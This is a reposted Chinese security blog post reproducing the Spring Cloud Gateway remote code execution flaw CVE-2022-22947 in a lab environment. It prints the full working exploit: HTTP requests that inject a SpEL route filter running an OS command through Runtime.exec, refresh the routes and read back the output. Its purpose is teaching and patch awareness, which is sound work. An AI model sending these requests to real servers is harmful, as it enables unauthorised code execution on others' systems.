Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

admin 2024年2月15日22:36:12评论0 views字数 2387阅读7分57秒阅读模式

漏洞说明

Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。
据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。

漏洞影响范围

Spring Cloud Gateway < 3.1.1Spring Cloud Gateway < 3.0.7Spring Cloud Gateway 其他已不再更新的版本

漏洞复现

使用vulfocus平台http://vulfocus.fofa.so/

运行CVE-2022-22947漏洞环境进行复现

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

漏洞利用如下:

一、添加恶意路由

POST /actuator/gateway/routes/Mc HTTP/1.1Host: 127.0.0.1:40385User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Content-Type: application/jsonContent-Length: 327{  "id": "Mc",  "filters": [{    "name": "AddResponseHeader",    "args": {      "name": "Result",      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"    }  }],  "uri": "http://example.com"}

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

二、刷新网关路由

POST /actuator/gateway/refresh HTTP/1.1Host: 127.0.0.1:40385Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

三、命令执行

GET /actuator/gateway/routes/Mc HTTP/1.1Host: 127.0.0.1:40385Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

四、测试完成后删除添加的恶意路由

DELETE /actuator/gateway/routes/Mc HTTP/1.1Host: 127.0.0.1:40385Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

修复建议

官方已发布安全版本,请及时下载更

下载地址:https://github.com/spring-cloud/spring-cloud-gateway 

原文始发于微信公众号(渗透笔记):Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日22:36:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)https://cn-sec.com/archives/2497121.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息